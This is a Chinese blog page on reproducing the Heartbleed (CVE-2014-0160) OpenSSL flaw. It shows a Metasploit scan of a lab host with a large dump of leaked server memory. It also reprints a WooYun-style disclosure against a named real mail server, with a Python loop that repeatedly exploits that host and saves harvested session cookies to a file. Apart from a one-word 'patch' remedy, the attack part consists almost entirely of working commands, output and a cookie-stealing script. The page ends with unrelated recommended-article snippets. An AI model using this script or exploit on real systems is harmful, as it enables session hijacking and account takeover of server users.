漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134

rhosts => 172.16.20.134

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...

[*] 172.16.20.134:443     - SSL record #1:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  86

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 82

[*] 172.16.20.134:443     -             Type:   Server Hello (2)

[*] 172.16.20.134:443     -             Server Hello Version:           0x0301

[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b

[*] 172.16.20.134:443     -             Server Hello Session ID length: 32

[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af

[*] 172.16.20.134:443     - SSL record #2:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  909

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 905

[*] 172.16.20.134:443     -             Type:   Certificate Data (11)

[*] 172.16.20.134:443     -             Certificates length: 902

[*] 172.16.20.134:443     -             Data length: 905

[*] 172.16.20.134:443     -             Certificate #1:

[*] 172.16.20.134:443     -                     Certificate #1: Length: 899

[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>

[*] 172.16.20.134:443     - SSL record #3:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  331

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 327

[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)

[*] 172.16.20.134:443     - SSL record #4:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  4

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 0

[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)

[*] 172.16.20.134:443     - Sending Heartbeat...

[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes

[+] 172.16.20.134:443     - Heartbeat response with leak

[*] 172.16.20.134:443     - Printable info leaked:

......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

乌云案例

详细说明:

code 区域

Fortinet邮箱服务器url:https://mail.fortinet.com.cn

存在漏洞的端口:443

该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息:

code 区域

可以看到账户cookie,可以通过如下脚本,不断的抓cookie:

code 区域

import os

import re

import time

accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '\n')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个:

漏洞证明:

修复方案:

补丁

HEARTBLEED 漏洞复现的更多相关文章

  1. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  2. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  3. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  4. 【S2-052】漏洞复现(CVE-2017-9805)

    一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...

  5. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  6. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  7. Struts2-052 漏洞复现

    s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

随机推荐

  1. jQuery中的查找节点、创建节点、插入节点、删除节点、替换节点、复制节点操作方法

    jQuery操作节点我们可以分六点来讲,查找节点.创建节点.插入节点.删除节点.替换节点.复制节点. 一.查找节点 text() - 设置或返回所选元素的文本内容   ,html() - 设置或返回所 ...

  2. D. Count the Arrays 计数题

    D. Count the Arrays 也是一个计数题. 题目大意: 要求构造一个满足题意的数列. \(n\) 代表数列的长度 数列元素的范围 \([1,m]\) 数列必须有且仅有一对相同的数 存在一 ...

  3. oracle常用字符函数

    字符函数: concat:(字符连接函数) --字符连接 select concat('con','cat') from dual; select 'co'||'nc'||'at' from dual ...

  4. JAVA设计模式之组合模式(composite)

    组合模式:树状结构专用模式 代码如下: package com.srr.dp.composite; import java.util.ArrayList; import java.util.List; ...

  5. 简单谈谈Spring的IoC

    一.前言   这几天正在复习Spring的相关内容,同时想要对Spring的实现原理做一些深入的研究.今天看了看Spring中IoC的实现,找到了一篇非常详细的博客,研究了一个下午,看完之后唯一的感受 ...

  6. 5G新基建到来,图扑推出智慧路灯三维可视化方案

    前言 作为智慧城市的重要组成部分,智慧灯杆管理系统采用信息化.数字化手段,把路灯及城市景观照明等各种不同对象的监控和数据采集及处理融于一体, 为城市管理者进行城市管理.进行科学决策提供了强有力的手段. ...

  7. JS实现手机号码中间4位变星号

    这个问题,我们可以用截取字符串解决,以下我列出2种方法,小伙伴们可以根据自己的需要选择哦: ● 1,substring()方法用于提取字符串中介于两个指定下标之间的字符. '; //该号码是乱打出来的 ...

  8. uCOS2014.1.11(转载)(void*)0 的理解

    一般把(void*)0定义为NULL表示这是个空指针void的含义void的字面意思是“无类型”,void *则为“无类型指针”,void *可以指向任何类型的数据.众所周知,如果指针p1和p2的类型 ...

  9. 大技霸教你远程执行Linux脚本和命令

    如果现在需要在 Linux 服务器上执行一系列命令(比如搭建 LNMP 环境)我应该会第一时间想到想办法写个 Shell 脚本,然后扔上去执行以下看看结果. 然而一贯懒惰的我并不想这么去执行 Shel ...

  10. Python单元测试框架:unittest(二)

    一.直接使用TestCase 注意所有测试方法都需要以test开头.代码如下: import unittest class Test1(unittest.TestCase): @classmethod ...